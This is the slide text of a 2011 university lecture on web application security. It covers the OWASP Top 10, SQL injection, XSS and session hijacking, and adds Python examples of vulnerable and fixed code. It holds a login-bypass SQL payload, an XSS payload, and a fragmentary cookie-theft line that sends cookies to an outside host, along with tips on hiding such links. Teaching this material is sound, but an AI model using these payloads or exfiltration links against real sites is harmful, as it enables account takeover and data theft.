
National Central University Computer Center, "Multimedia and Network Applications" IT outreach course: Introduction to Web Application Security. Date: 2011/03/27. Lecturer: 張竟 (third-year Computer Science), cwebb [dot] tw [at] gmail [dot] com.





2 Agenda: banter, OWASP Top 10, SQL injection, XSS, cookie & session


4 Don't do bad things!

5 Don't get caught!


7 Don't say I taught you this.


9 Web security? Early days vs. today; static vs. dynamic. Where there is code, there are vulnerabilities!

10 Ways to attack: the OS, the web server, the web application.

11 Attack scenarios: attack the web server to gain privileges, steal information, or use it to attack users; attack other users to steal their information or carry out further attacks. Attacks may be combined.



14 OWASP Top 10: A1: Injection; A2: Cross-Site Scripting (XSS); A3: Broken Authentication and Session Management; A4: Insecure Direct Object References; A5: Cross-Site Request Forgery (CSRF)

15 OWASP Top 10: A6: Security Misconfiguration; A7: Insecure Cryptographic Storage; A8: Failure to Restrict URL Access; A9: Insufficient Transport Layer Protection; A10: Unvalidated Redirects and Forwards




19 Injections: the attacker's fill-in-the-blanks game. Where can an attacker inject? Databases (MySQL, MS SQL, PostgreSQL...), NoSQL stores, directory services (LDAP), and system commands!!

20 How SQL works in a web application, using a login page as the example. Client, web server, SQL server: the client sends a request with id and pwd; the web server runs select * from account where `id`=id and `pwd`=pwd; the SQL server returns the result; the web server returns login success/failed.

21 Why SQL? Widely used; stores large amounts of site data; injection friendly.

22 How do injections work? Using MySQL as the example:

    $query = "select * from account where `id`='$id' and `pwd`='$pwd'";

With $id = ' or 1=1 -- the query becomes:

    select * from account where `id`='' or 1=1 -- ' and `pwd`='$pwd'

Everything after -- is a comment, so the password check is never evaluated and the where clause is always true.

23 Attack techniques: union-based and blind attacks.

24 Impact: data stolen or modified; site privileges obtained; the whole site taken over.

25 How to defend: use safe APIs; filter and escape special characters; never put user input directly into the query; use a scanner to find vulnerabilities in the code.
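The login query from slides 20 and 22 beside its parameterised ("safe API") form, as an added example that is not part of the slides; it assumes a constructed in-memory sqlite3 table in place of the MySQL server, and uses the slide's own ' or 1=1 -- input to show that the safe version treats it as plain data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the SQL server: one account row.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id TEXT, pwd TEXT)")
    conn.execute("INSERT INTO account VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, user_id, pwd):
    # Same construction as the slide's $query: user input pasted into the SQL text,
    # so a quote and a comment marker in the input rewrite the statement.
    query = f"select * from account where `id`='{user_id}' and `pwd`='{pwd}'"
    return conn.execute(query).fetchone() is not None


def login_safe(conn, user_id, pwd):
    # Parameterised query: the values travel separately from the SQL text, so
    # quotes and "--" in the input stay data and never become part of the statement.
    query = "select * from account where `id`=? and `pwd`=?"
    return conn.execute(query, (user_id, pwd)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1 -- "
    print("vulnerable, injected id:", login_vulnerable(db, probe, "wrong"))  # True
    print("safe, injected id:      ", login_safe(db, probe, "wrong"))        # False
```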

26 Practice


28 XSS, Cross Site Scripting: writing code on someone else's website!

29 Background knowledge: HTTP GET, HTTP POST.

30 How the attack works: deliver the payload via POST/GET; the "scripting" ends up in the server's page; strange-looking URLs.

31 How the attack works: javascript /

32 Example: alert("i'm Orange")

33 What can happen? Take you to a malicious site; send your information to the attacker; or just for fun!

34 Just for fun: the Samy MySpace XSS worm. "Samy is my hero!" Infection.

35 Big sites are XSSable too: MySpace, Facebook, Twitter, Plurk...

36 How to defend. For the server: whatever needs escaping must be escaped; use a scanner to find vulnerabilities in the code. For users: be wary of strange links; rely on the browser / antivirus software.
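The reflected GET case from slides 30 and 32 with and without output escaping, as an added example that is not part of the slides; the URL, the "q" parameter name and the page template are constructed, and the payload is the slide's alert("i'm Orange") string, URL-encoded as it would arrive in a "strange url".

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed request: the slide's alert payload arriving as a GET parameter.
SAMPLE_URL = (
    "http://example.invalid/search"
    "?q=%3Cscript%3Ealert(%22i%27m%20Orange%22)%3C/script%3E"
)


def query_param(url, name):
    # Decode the parameter the way the server's framework would before reflecting it.
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_unsafe(q):
    # Reflects the parameter verbatim: the browser parses it as markup and runs the script.
    return f"<p>Results for: {q}</p>"


def render_safe(q):
    # Escapes &, <, >, " and ' so the same input is displayed as text, not executed.
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def contains_script_tag(page):
    # Cheap check a defender can run over rendered output in a test suite.
    return "<script" in page.lower()


if __name__ == "__main__":
    q = query_param(SAMPLE_URL, "q")
    print(render_unsafe(q))  # script tag survives
    print(render_safe(q))    # &lt;script&gt;... shown as text
```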

37 Practice


39 Background knowledge: cookie, session. A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data. The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.



42 If you get hold of the cookie, you can

43 How is it stolen?


45 Send the cookie to the cloud! Use GET/POST to make the page send the cookie away. ex: [" "].join(http://in1.ncu.cc/~ /keke/t.php?t= The server side is simple: it just stores the cookie.

46 Which idiot would click a link like this?

47 Hiding it: there are URL shorteners (tinyurl.com / 0rz.tw / goo.gl / bit.ly); embed it in another page (ex: an iframe with width and height set to 0 or 1); and ugly URLs are EVERYWHERE, for example: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2 and https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1

48 Defenses: lock the session to the user agent / headers; bind it to the IP address. * Best of all, don't let the attack succeed in the first place. *

49 Locking the session to the user agent / headers:

    session_start();  // needed before $_SESSION can be used
    if (isset($_SESSION['HTTP_USER_AGENT'])) {
        // Compare the hash stored on the first request with this request's User-Agent
        if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
            exit();
        }
    } else {
        // First request of the session: remember a hash of this client's User-Agent
        $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
    }

But... if someone can steal the cookie, would they really be unable to get the headers too?

50 Practice

51 Q&A?

52 End

53 Reference: http://goo.gl/IwGbX




